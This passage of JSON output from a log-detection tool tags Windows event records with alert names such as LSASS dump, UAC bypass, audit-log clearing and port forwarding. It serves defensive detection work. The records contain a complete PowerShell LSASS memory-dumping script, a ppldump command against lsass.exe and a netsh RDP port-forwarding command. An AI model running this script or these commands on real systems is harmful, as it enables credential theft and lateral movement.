22:09:35.263"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564605,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:35.284225Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-09-28 12:47:36.624","Image":"C:\\WINDOWS\\system32\\rdrleakdiag.exe","ProcessGuid":"BC47D85C-DB68-5F71-0000-0010B237AB01","ProcessId":3352,"RuleName":"","TargetFilename":"C:\\Users\\wanwan\\Desktop\\minidump_668.dmp","UtcTime":"2020-09-28 12:47:36.624"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-PIU87N6","Correlation":null,"EventID":11,"EventRecordID":5229,"Execution_attributes":{"ProcessID":2848,"ThreadID":2328},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-09-28T12:47:36.630448Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":198238040,"Execution_attributes":{"ProcessID":744,"ThreadID":2028},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-25T09:09:14.916619Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x8d7099","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":769792,"Execution_attributes":{"ProcessID":264,"ThreadID":7672},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-17T10:57:37.013214Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x4c331","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"KeeFarce.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\","Description":"?","FileVersion":"?","Hashes":"SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40","Image":"C:\\Users\\Public\\KeeFarce.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A19B-5CC4-0000-0020A8FF0000","LogonId":"0xffa8","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-A22D-5CC4-0000-0010E2830900","ParentProcessId":3680,"ProcessGuid":"365ABB72-A3A4-5CC4-0000-001084960C00","ProcessId":1288,"Product":"?","RuleName":"technique_id=T1036,technique_name=Masquerading","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-27 18:47:00.046"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7020,"Execution_attributes":{"ProcessID":1816,"ThreadID":1228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-27T18:47:00.046849Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747","Image":"C:\\Users\\Public\\KeeFarce.exe","ImageLoaded":"C:\\Users\\Public\\BootstrapDLL.dll","ProcessGuid":"365ABB72-A3A4-5CC4-0000-001084960C00","ProcessId":1288,"Product":"?","RuleName":"creddump - keefarce HKTL","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-04-27 18:47:00.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7022,"Execution_attributes":{"ProcessID":1816,"ThreadID":1228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-04-27T18:47:00.062474Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Users\\administrator\\Desktop\\x64\\Outflank-Dumpert.exe","ProcessGuid":"ECAD0485-88C9-5D0C-0000-0010348C1D00","ProcessId":3572,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:37.324"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238375,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:35:37.329185Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"ECAD0485-88D6-5D0C-0000-001007AA1D00","ProcessId":1568,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:50.258"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238380,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:35:50.259077Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"ECAD0485-88D6-5D0C-0000-001007AA1D00","ProcessId":1568,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:50.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238383,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:35:50.729226Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-21 07:36:50.985","Image":"C:\\Users\\administrator\\Desktop\\AndrewSpecial.exe","ProcessGuid":"ECAD0485-8912-5D0C-0000-0010FD2F1F00","ProcessId":3552,"RuleName":"","TargetFilename":"C:\\Users\\administrator\\Desktop\\Andrew.dmp","UtcTime":"2019-06-21 07:36:50.985"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238387,"Execution_attributes":{"ProcessID":1560,"ThreadID":2316},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-21T07:36:51.681567Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Version","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5589,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"KEYLOGGER_DIRECTX.EXE","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Name","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5590,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"KEYLOGGER_DIRECTX.EXE4755D1CB0002A410","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Id","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5591,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\MostRecentStart","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5592,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Accessing WinAPI in PowerShell","Malicious PowerShell Keywords","PowerShell Get-Process LSASS in ScriptBlock"],"event":{"Event":{"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"C:\\Users\\Public\\lsass_wer_ps.ps1","ScriptBlockId":"27f08bda-c330-419f-b83b-eb5c0f699930","ScriptBlockText":"function Memory($path)\r\n{\r\n\t\t\t \r\n\t\t\t \r\n\t\t$Process = Get-Process lsass\r\n\t\t$DumpFilePath = $path\r\n\t\t\r\n\t\t$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')\r\n\t\t$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')\r\n\t\t$Flags = [Reflection.BindingFlags] 'NonPublic, Static'\r\n\t\t$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)\r\n\t\t$MiniDumpWithFullMemory = [UInt32] 2\r\n\t\r\n\t\t\t\r\n\t\t\t #\r\n\t\t$ProcessId = $Process.Id\r\n\t\t$ProcessName = $Process.Name\r\n\t\t$ProcessHandle = $Process.Handle\r\n\t\t$ProcessFileName = \"$($ProcessName).dmp\"\r\n\t\t\r\n\t\t$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName\r\n\t\t\r\n\t\t$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)\r\n\t\t\t \r\n\t\t$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$ProcessId,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$FileStream.SafeFileHandle,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$MiniDumpWithFullMemory,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero))\r\n\t\t\t \r\n\t\t$FileStream.Close()\r\n\t\t\r\n\t\tif (-not $Result)\r\n\t\t{\r\n\t\t\t$Exception = New-Object ComponentModel.Win32Exception\r\n\t\t\t$ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\"\r\n\t\t\t\r\n\t\t\t# Remove any partially written dump files. For example, a partial dump will be written\r\n\t\t\t# in the case when 32-bit PowerShell tries to dump a 64-bit process.\r\n\t\t\tRemove-Item $ProcessDumpPath -ErrorAction SilentlyContinue\r\n\t\t\t\r\n\t\t\tthrow $ExceptionMessage\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t\"Memdump complete!\"\r\n\t\t}\r\n\t\r\n}"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"4AA5EAE3-4F33-0001-3A2B-A64A334FD601"},"EventID":4104,"EventRecordID":971,"Execution_attributes":{"ProcessID":7008,"ThreadID":6488},"Keywords":"0x0","Level":3,"Opcode":15,"Provider_attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"},"Security_attributes":{"UserID":"S-1-5-21-3461203602-4096304019-2269080069-1000"},"Task":2,"TimeCreated_attributes":{"SystemTime":"2020-06-30T14:24:08.254605Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - System log was cleared"],"event":{"Event":{"System":{"Channel":"System","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":104,"EventRecordID":63220,"Execution_attributes":{"ProcessID":264,"ThreadID":644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security_attributes":{"UserID":"S-1-5-21-308926384-506822093-3341789130-1106"},"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-15T19:28:31.453647Z"},"Version":0},"UserData":{"LogFileCleared":{"BackupPath":"","Channel":"System","SubjectDomainName":"3B","SubjectUserName":"a-jbrown"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"ppldump.exe -p lsass.exe -o a.png","Company":"?","CurrentDirectory":"c:\\Users\\Public\\BYOV\\ZAM64\\","Description":"?","FileVersion":"?","Hashes":"SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC","Image":"C:\\Users\\Public\\BYOV\\ZAM64\\ppldump.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-21D2-5E41-0000-002034770900","LogonId":"0x97734","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-27FE-5E41-0000-0010DD653800","ParentProcessId":4236,"ProcessGuid":"747F3D96-2B98-5E41-0000-00109C904700","ProcessId":5016,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-02-10 10:08:24.525"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":20012,"Execution_attributes":{"ProcessID":2728,"ThreadID":3456},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-02-10T10:08:24.535095Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"chost.exe payload.bin","Company":"?","CurrentDirectory":"C:\\Users\\Public\\tools\\evasion\\","Description":"?","FileVersion":"?","Hashes":"SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25","Image":"C:\\Users\\Public\\tools\\evasion\\chost.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8E79-5EFD-0000-0020B446E837","LogonId":"0x37e846b4","OriginalFileName":"?","ParentCommandLine":"\"C:\\windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"00247C92-1117-5EFE-0000-001025004E3A","ParentProcessId":30572,"ProcessGuid":"00247C92-20BD-5EFE-0000-00106D029D3A","ProcessId":16900,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":7,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-07-02 18:00:29.612"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2116720,"Execution_attributes":{"ProcessID":5320,"ThreadID":6908},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-02T18:00:29.615842Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Conhost Parent Process Executions"],"event":{"Event":{"EventData":{"CommandLine":"notepad","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Notepad","FileVersion":"10.0.18362.693 (WinBuild.160101.0800)","Hashes":"SHA1=C401CD335BA6A3BDAF8799FDC09CDC0721F06015,MD5=06E6C0482562459ADB462CA9008262F8,SHA256=E5D90BEEB6F13F4613C3153DABBD1466F4A062B7252D931F37210907A7F914F7,IMPHASH=E2D17AC7541817AA681AE8FF7734AD89","Image":"C:\\Windows\\System32\\notepad.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8E79-5EFD-0000-0020B446E837","LogonId":"0x37e846b4","OriginalFileName":"NOTEPAD.EXE","ParentCommandLine":"\\??\\C:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1","ParentImage":"C:\\Windows\\System32\\conhost.exe","ParentProcessGuid":"00247C92-1117-5EFE-0000-00105A024E3A","ParentProcessId":29168,"ProcessGuid":"00247C92-20BD-5EFE-0000-00105C059D3A","ProcessId":16788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":7,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-07-02 18:00:29.642"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2116722,"Execution_attributes":{"ProcessID":5320,"ThreadID":6908},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-02T18:00:29.650400Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"spooler.exe payload.bin","Company":"?","CurrentDirectory":"c:\\Users\\Public\\tools\\cinj\\","Description":"?","FileVersion":"?","Hashes":"SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4","Image":"C:\\Users\\Public\\tools\\cinj\\spooler.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1CE4-5EFE-0000-00208F9C0800","LogonId":"0x89c8f","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1E44-5EFE-0000-001096443700","ParentProcessId":1140,"ProcessGuid":"747F3D96-1EA9-5EFE-0000-0010B1F13D00","ProcessId":6892,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-02 17:51:37.815"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":304593,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-02T17:51:37.819891Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port Forwarding","Netsh RDP Port Forwarding"],"event":{"Event":{"EventData":{"CommandLine":"netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5","Company":"Microsoft Corporation","CurrentDirectory":"c:\\","Description":"Network Command Shell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=7DA1852DF83C58841AD35248AD2A20D7FFBB7FA0,MD5=784A50A6A09C25F011C3143DDD68E729,SHA256=661F5D4CE4F0A6CB32669A43CE5DEEC6D5A9E19B2387F22C5012405E92169943,IMPHASH=33B8120C37D7861778989FBFD16214E1","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-DC3E-5CE6-0000-00102BC97200","ParentProcessId":712,"ProcessGuid":"365ABB72-DC5C-5CE6-0000-001066E27200","ProcessId":4088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 17:46:04.651"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1026,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:46:04.671625Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult 